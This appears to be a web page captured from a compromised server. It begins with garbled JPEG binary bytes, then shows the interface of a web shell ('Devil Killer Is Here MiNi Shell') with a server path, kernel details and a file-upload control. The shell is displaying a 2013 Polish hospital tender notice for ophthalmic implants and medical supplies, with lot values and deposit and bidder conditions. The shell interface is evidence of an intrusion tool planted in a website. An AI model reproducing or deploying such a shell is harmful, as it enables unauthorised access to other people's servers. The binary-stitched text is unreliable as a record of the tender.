JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/249167-N-2013.html

<p class="kh_header"><b>Chorzów: Zakup i dostawa materiałów wszczepialnych, wiskoelastycznych, soczewek wewnątrzgałkowych oraz sprzętu medycznego wielorazowego i jednorazowego użytku  z podziałem na części</b><br>
<b>Numer ogłoszenia: 249167 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Zespół Szpitali Miejskich w Chorzowie , ul. Strzelców Bytomskich 11, 41-500 Chorzów, woj. śląskie, tel. 032 3499115, faks 032 2413952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów wszczepialnych, wiskoelastycznych, soczewek wewnątrzgałkowych oraz sprzętu medycznego wielorazowego i jednorazowego użytku  z podziałem na części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wartość szacunkowa zamówienia podstawowego wraz z zamówieniem opcjonalnym, czyli dla maksymalnego poziomu realizacji zamówienia wynosi (bez VAT) 218 099,61 zł tj. 54 259,03 euro.

Część zamówienia nr 1 - Soczewka hydrofobowa jednoczęściowa akrylowa z kartridżem oraz z końcówkami do irygacji i aspiracji - wartość szacunkowa bez VAT wynosi: 27 000 zł;
Część zamówienia nr 2 - Soczewka hydrofilna jednoczęściowa akrylowa z haptenami stabilizującymi soczewkę w czterech punktach w jednorazowym jednoczęściowym iniektorze  - wartość szacunkowa bez VAT wynosi: 32 407,41 zł;
Część zamówienia nr 3 - Soczewka hydrofilna jednoczęściowa akrylowa z dwoma niezależnymi otworami w haptenie z jednorazowym iniektorem i kartridżem  - wartość szacunkowa bez VAT wynosi: 18 518,52 zł;
Część zamówienia nr 4 - Materiał wiskoelastyczny z hialuronianem sodu o właściwościach kohezyjnych - wartość szacunkowa bez VAT wynosi: 16 481,48 zł; 
Część zamówienia nr 5 - Zestaw 2 materiałów wiskoelastycznych (do techniki soft-shell) - wartość szacunkowa bez VAT wynosi: 16 000 zł;
Część zamówienia nr 6 - Mikroimplant do chirurgicznego leczenia jaskry, w sterylnym jednorazowym iniektorze - wartość szacunkowa bez VAT wynosi: 9 200 zł;
Część zamówienia nr 7 - Retraktory tęczówkowe  - wartość szacunkowa bez VAT wynosi: 970,36 zł;
Część zamówienia nr 8 - Zestaw Custom Pak do aparatu Infiniti  - wartość szacunkowa bez VAT wynosi: 30 150 zł;
Część zamówienia nr 9 - Witrektomy przednie pasujące do aparatu INFINITI Vision System  - wartość szacunkowa bez VAT wynosi: 2 760 zł;
Część zamówienia nr 10 - Jednorazowy sterylny zestaw do operacji zaćmy - wartość szacunkowa bez VAT wynosi: 16 822,22 zł;
Część zamówienia nr 11 - Materiały eksploatacyjne dla sterylizacji - wartość szacunkowa bez VAT wynosi: 1 320 zł;
Część zamówienia nr 12 - Czyścik do diatermii - wartość szacunkowa bez VAT wynosi: 440 zł;
Część zamówienia nr 13 - Fartuch ochronny - wartość szacunkowa bez VAT wynosi: 1 200 zł;
Część zamówienia nr 14 - Serwety i podkłady - wartość szacunkowa bez VAT wynosi: 11 598,92 zł; 
Część zamówienia nr 15 - Podkłady podgumowane - wartość szacunkowa bez VAT wynosi: 487,80 zł; 
Część zamówienia nr 16 - Elektrody do kardiostymulacji - wartość szacunkowa bez VAT wynosi: 555,56 zł; 
Część zamówienia nr 17 - Butelki do reduktora tlenowego - wartość szacunkowa bez VAT wynosi: 925,93 zł; 
Część zamówienia nr 18 - Taca i kieliszki do leków - wartość szacunkowa bez VAT wynosi: 1463,41 zł;
Część zamówienia nr 19 - Elektrody do rzutu serca dla dorosłych - wartość szacunkowa bez VAT wynosi: 12 000 zł; 
Część zamówienia nr 20 - Fartuch foliowy - wartość szacunkowa bez VAT wynosi: 700 zł;
Część zamówienia nr 21 - Kaniule i wkłucia centralne - wartość szacunkowa bez VAT wynosi: 6 033,43 zł;
Część zamówienia nr 22 - Rękawice sterylne - 3 - wartość szacunkowa bez VAT wynosi: 314,81 zł;
Część zamówienia nr 23 - Wkłady workowe - wartość szacunkowa bez VAT wynosi: 2 010 zł; 
Część zamówienia nr 24 - Koce do ogrzewania pacjentów - wartość szacunkowa bez VAT wynosi: 2 945 zł; 
Część zamówienia nr 25 - Wałek i podkładki pozycjonujące, przeciwodleżynowe - wartość szacunkowa bez VAT wynosi: 1 156,76zł;     
Część zamówienia nr 26 - Pojemniki na odpady medyczne - wartość szacunkowa bez VAT wynosi: 4 638 zł..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0, 33.73.11.10-7, 33.66.21.00-9, 31.12.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 26.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawca składający ofertę na wszystkie części zamówienia jest zobowiązany do zabezpieczenia ofert wadium w wysokości: 6 235 zł (słownie: sześć tysięcy dwieście trzydzieści pięć złotych).
Natomiast, Wykonawca składający ofertę na poszczególne części zamówienia jest zobowiązany do zabezpieczenia oferty wadium w wysokości dla tej części:
Część zamówienia nr 1 - Soczewka hydrofobowa jednoczęściowa akrylowa z kartridżem w komplecie z końcówkami do irygacji i aspiracji wadium: 810 zł,
Część zamówienia nr 2 - Soczewka hydrofilna jednoczęściowa z heptanami stabilizującymi soczewkę w czterech punktach w jednorazowym jednoczęściowym iniektorze wadium: 970 zł,
Część zamówienia nr 3 - Soczewka hydrofilna jednoczęściowa akrylowa z dwoma niezależnymi otworami w haptenie, z jednorazowym iniektorem i kartridżem. Możliwość implantacji przez ciecie 2.2mm wadium: 550 zł,
Część zamówienia nr 4 - Materiał wiskoelastyczny z hialuronianem sodu o właściwościach kohezyjnych wadium: 490 zł,
Część zamówienia nr 5 - Zestaw 2 materiałów wiskoelastycznych (do techniki soft-shell) wadium: 480 zł,
Część zamówienia nr 6 - Mikroimplant do chirurgicznego leczenia jskry, w sterylnym jednorazowym iniektorze wadium: 270 zł,
Część zamówienia nr 8 - Zestaw Custom Pak do aparatu Infiniti wadium: 900 zł,
Część zamówienia nr 9 - Witrektomy przednie pasujące do aparatu  INFINITI  Vision  System wadium: 80 zł,
Część zamówienia nr 10  - Jednorazowy sterylny zestaw do operacji zaćmy  wadium: 500 zł,
Część zamówienia nr 14 - Serwety i podkłady wadium: 340 zł,
Część zamówienia nr 19 - Elektrody do rzutu serca dla dorosłych wadium: 360 zł,
Część zamówienia nr 21 - Kaniule i wkłucia centralne wadium: 180 zł,
Część zamówienia nr 23 - Wkłady workowe wadium: 60 zł,
Część zamówienia nr 24 - Koce do ogrzewania pacjentów wadium: 80 zł,
Część zamówienia nr 25 - Wałek i podkładki pozycjonujące, przeciwodleżynowe wadium: 35 zł,
Część zamówienia nr 26 - Pojemniki na odpady medyczne wadium: 130 zł.

Wadium nie jest wymagane dla części zamówienia: nr 7 - Retraktory tęczówkowe; nr 11 - Materiały eksploatacyjne dla sterylizacji; nr 12 - Czyścik do diatermii; nr 13 - Fartuch ochronny; nr 15 - Podkłady podgumowane; nr 16 - Elektrody do kardiostymulacji; nr 17 - Butelki do reduktora tlenowego; nr 18 - Taca i kieliszki do leków; nr 20 - Fartuch foliowy; nr 22 - Rękawice sterylne - 3.

Zamawiający dopuszcza wniesienie wadium w następujących formach: pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
ING BANK ŚLĄSKI  S.A. O/ CHORZÓW  Nr  21 1050 1243 1000 0010 0009 7517
Wadium w pieniądzu wniesione zostaje na oprocentowany rachunek bankowy.
Wadium w formie niepieniężnej należy złożyć w Kasie Głównej Zespołu Szpitali Miejskich.
Termin wniesienia wadium upływa dnia 02.12.2013r. o godzinie 11.00
Zwrot oraz utrata wadium następuje zgodnie z art. 46 ustawy - Prawo zamówień publicznych z późn. zm.
W celu potwierdzenia zabezpieczenia złożonej oferty wadium Zamawiający wymaga załączenia kserokopii wniesionego wadium do oferty przetargowej. Wartość i formy w jakich Wykonawca może zabezpieczyć ofertę wadium podano powyżej</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu w myśl art. 24 ust. 1 
pkt. 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych z późniejszymi zmianami oraz spełniają warunki określone w art. 22 ust. 1 ww. ustawy dotyczące:
1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2.	posiadania wiedzy i doświadczenia; 
3.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
4.	sytuacji ekonomicznej i finansowej. 

Ocena sytuacji podmiotowej wykonawców ubiegających się o udzielenie zamówienia oceniona zostanie na podstawie dokumentów załączonych od oferty przetargowej.
Zamawiający wymaga przedstawienia w ofercie przetargowej dokumentów umożliwiających ocenę braku podstaw do wykluczenia Wykonawcy z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24  ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych z późniejszymi zmianami. 
Zamawiający wymaga od Wykonawców ubiegających się wspólnie o udzielenie zamówienia ustanowienia pełnomocnika do reprezentacji w postępowaniu przetargowym lub ustanowienia pełnomocnika do reprezentacji w postępowaniu przetargowym i zawarcia umowy. 
W przypadku dokonania wyboru oferty Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Zamawiający zastrzega sobie możliwość żądania przed zawarciem umowy o zamówienie publiczne umowy regulującej współpracę tych wykonawców. 
Jednocześnie Zamawiający wymaga, aby każdy z Wykonawców ubiegających się o udzielenie zamówienia wspólnie (nie dotyczy Podwykonawców) przedłożył w ofercie przetargowej dokumenty stanowiące potwierdzenie, iż nie podlega wykluczeniu w myśl art. 24 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych zgodnie z wymaganiami ujętymi poniżej.
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych poniżej zgodnie z § 3 ust. 4 Rozporządzenia PRM z dnia 19.02.2013r. (Dz. U. 2013, poz. 231)

Zamawiający wymaga załączenia w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę, następujących dokumentów: 

1.	oświadczenia dotyczącego:
- braku podstaw do wykluczenia Wykonawcy z postępowania o udzielenie zamówienia publicznego;
- niezalegania z opłacaniem podatków lub oświadczenia, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub wstrzymanie w całości wykonania decyzji właściwego organu;
- niezalegania z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub oświadczenia, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
- niekaralności w zakresie określonym w art. 24. ust. 1 pkt. 4-8 Ustawy - Prawo zamówień publicznych oraz w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy.
Treść oświadczenia (wzór) ujęta jest w załączniku nr 1 do SIWZ (formularz ofertowy).
2.	Zamawiający wymaga załączenia w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę aktualnego odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy PZP, a w stosunku do osób fizycznych oświadczenia w niniejszym zakresie (w przypadku Wykonawców działających w oparciu o wpis do centralnej ewidencji i informacji o działalności gospodarczej: wystarczy przedłożyć w to miejsce wydruk z CEIDG i potwierdzić za zgodność).
3.	Wykonawca zobowiązany jest złożyć wraz z ofertą przetargową listę podmiotów należących do tej samej grupy kapitałowej albo informację o tym, że nie należy do grupy kapitałowej, celem oceny czy podmioty należące do tej samej grupy kapitałowej złożyły odrębne oferty w postępowaniu przetargowym. 
Uwaga: Podmioty należące do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50 poz. 331 z późn. zm.) składające odrębne oferty w tym samym postępowaniu mogą zgodnie z przesłankami art. 24 ust. 2 pkt. 5 ustawy PZP wykazać, że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy wykonawcami. Zamawiający na podstawie art. 24b ust. 3 wyklucza z postępowania o udzielenie zamówienia wykonawcę, który nie złożył wyjaśnień oraz wykonawcę, który nie złożył listy, o której mowa w art. 26 ust 2d ustawy PZP. 

Dokumenty podmiotów zagranicznych:
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:
1. nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
2. nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem potwierdzenia przez Wykonawcę spełnienia warunku posiadania wiedzy i doświadczenia Zamawiający wymaga załączenia do oferty przetargowej wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, dat i miejsca wykonania, danych podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - załącznik nr 3 do SIWZ (§ 1.1. ppkt 3. Rozp. PRM 19.02.2013r.; Dz. U. 2013, poz. 231). Dowodami, o których mowa powyżej, są: 
1) poświadczenia, z których wynika, iż zamówienie zrealizowano efektywnie, z rzetelnością lub w sposób potwierdzający kwalifikacje i doświadczenie Wykonawcy (z tym że w odniesieniu do nadal wykonywanych dostaw poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert), 
oraz 
2) oświadczenie, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze nie jest on w stanie uzyskać poświadczenia, o którym mowa powyżej (§ 1.2. ppkt. 1 i 3. Rozp. PRM 19.02.2013r.; Dz. U. 2013, poz. 231). 
W razie konieczności, gdy wykaz dostaw lub przedłożone dowody budzą wątpliwości Zamawiający może zwrócić się do podmiotu, na rzecz którego realizowane było zamówienie, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu. 
3) dokumenty potwierdzające należyte wykonanie dostaw - zgodnie z zapisami §9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. Wykonawca w miejsce poświadczeń, o których mowa w §1 ust. 2 pkt. 1 rozporządzenia może przedkładać w ofercie przetargowej dokumenty potwierdzające należyte wykonanie dostaw, o których mowa w rozporządzeniu z dnia 30 grudnia 2009 r. Dokumenty złożone w oparciu o wymienioną wyżej podstawę prawną wraz z wykazem dostaw stanowią spełnienie warunku posiadania wiedzy i doświadczenia opisanego w SIWZ i ogłoszeniu o zamówieniu. 
Zamawiający wymaga wykazania w ww. wykazie  minimum jednego zamówienia o charakterze i złożoności oraz o wartości nie niższej niż 50% wartości szacunkowej części zamówienia, na którą wykonawca składa ofertę wraz z załączeniem dowodu należytego wykonania tego zamówienia, bądź poświadczenia /oświadczenia Wykonawcy, o którym mowa powyżej. 
Zamawiający dopuszcza możliwość załączenia przez Wykonawcę do oferty przetargowej wykazu wykonanych i wykonywanych dostaw obejmującego dłuższy okres niż wskazany w niniejszym punkcie.
Uwaga: wykazując spełnienie warunków posiadania wiedzy i doświadczenia Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków. 
Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (oświadczenie) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia wraz ze wskazaniem w formie oświadczenia (formularz ofertowy) zakresu, sposobu wykorzystania zasobów udostępnianych, charakteru stosunków, zakresu i okresu udziału innego podmiotu przy wykonaniu zamówienia, celem potwierdzenia i oceny, czy stosunek łączący Wykonawcę z podmiotem udostępniającym potencjał faktycznie gwarantuje rzeczywisty dostęp do wskazanych zasobów. 
(Wykonawca może skorzystać z przygotowanego przez Zamawiającego załącznika, może też modyfikować jego treść - załącznik nr 5 do SIWZ (oświadczenie).)
Uwaga: Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane - Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ust. 2 paragraf 1 ww. rozporządzenia w przypadku, gdy zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie, zostały wcześniej wykonane. Oświadczenie w tym zakresie ujęto w  załączniku nr 3 do SIWZ. 
Wykonawcy, którzy nie realizowali na rzecz Zamawiającego dostaw składają dowody należytego wykonania dostaw wymienionych w wykazie, natomiast treść oświadczenia umieszczonego w załączniku nr 3 do SIWZ mogą usunąć bądź skreślić.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający żąda przedstawienia informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wysokość posiadanych środków finansowych lub zdolność kredytowa winna wynosić nie mniej niż 50% wartości szacunkowej części zamówienia, do której przystępuje Wykonawca, czyli: 
Część zamówienia nr 1 - Soczewka hydrofobowa jednoczęściowa akrylowa z kartridżem w komplecie z końcówkami do irygacji i aspiracji - 50% wartości szacunkowej części (bez VAT): 13 500,00 zł;
Część zamówienia nr 2 - Soczewka hydrofilna jednoczęściowa z heptanami stabilizującymi soczewkę w czterech punktach w jednorazowym jednoczęściowym iniektorze	 - 50% wartości szacunkowej części (bez VAT): 16 203,71 zł;
Część zamówienia nr 3 - Soczewka hydrofilna jednoczęściowa akrylowa z dwoma niezależnymi otworami w haptenie, z jednorazowym iniektorem i kartridżem. Możliwość implantacji przez ciecie 2.2mm - 50% wartości szacunkowej części (bez VAT): 9 259,26 zł;
Część zamówienia nr 4 - Materiał wiskoelastyczny z hialuronianem sodu o właściwościach kohezyjnych - 50% wartości szacunkowej części (bez VAT): 8 240,74 zł;
Część zamówienia nr 5 - Zestaw 2 materiałów wiskoelastycznych (do techniki soft-shell) - 50% wartości szacunkowej części (bez VAT): 8 000,00 zł;
Część zamówienia nr 6 - Mikroimplant do chirurgicznego leczenia jskry, w sterylnym jednorazowym iniektorze -50% wartości szacunkowej części (bez VAT): 4 600,00 zł;
Część zamówienia nr 7 - Retraktory tęczówkowe - 50% wartości szacunkowej części (bez VAT): 485,18 zł;
Część zamówienia nr 8 - Zestaw Custom Pak do aparatu Infiniti - 50% wartości szacunkowej części (bez VAT): 15 075,00 zł;
Część zamówienia nr 9 - Witrektomy przednie pasujące do aparatu  INFINITI  Vision  System - 50% wartości szacunkowej części (bez VAT): 1 380,00 zł;
Część zamówienia nr 10 - Jednorazowy sterylny zestaw do operacji zaćmy - 50% wartości szacunkowej części (bez VAT): 8 411,11 zł;
Część zamówienia nr 11 - Materiały eksploatacyjne dla sterylizacji - 50% wartości szacunkowej części (bez VAT): 660,00 zł;
Część zamówienia nr 12 - Czyścik do diatermii - 50% wartości szacunkowej części (bez VAT): 220,00 zł;
Część zamówienia nr 13 - Fartuch ochronny - 50% wartości szacunkowej części (bez VAT): 600,00 zł;
Część zamówienia nr 14 - Serwety i podkłady - 50% wartości szacunkowej części (bez VAT): 5 799,46 zł;
Część zamówienia nr 15 - Podkłady podgumowane -50% wartości szacunkowej części (bez VAT): 243,90 zł;
Część zamówienia nr 16 - Elektrody do kardiostymulacji - 50% wartości szacunkowej części (bez VAT): 277,78 zł;
Część zamówienia nr 17 - Butelki do reduktora tlenowego - 50% wartości szacunkowej części (bez VAT): 462,97 zł;
Część zamówienia nr 18 - Taca i kieliszki do leków - 50% wartości szacunkowej części (bez VAT): 731,71 zł;
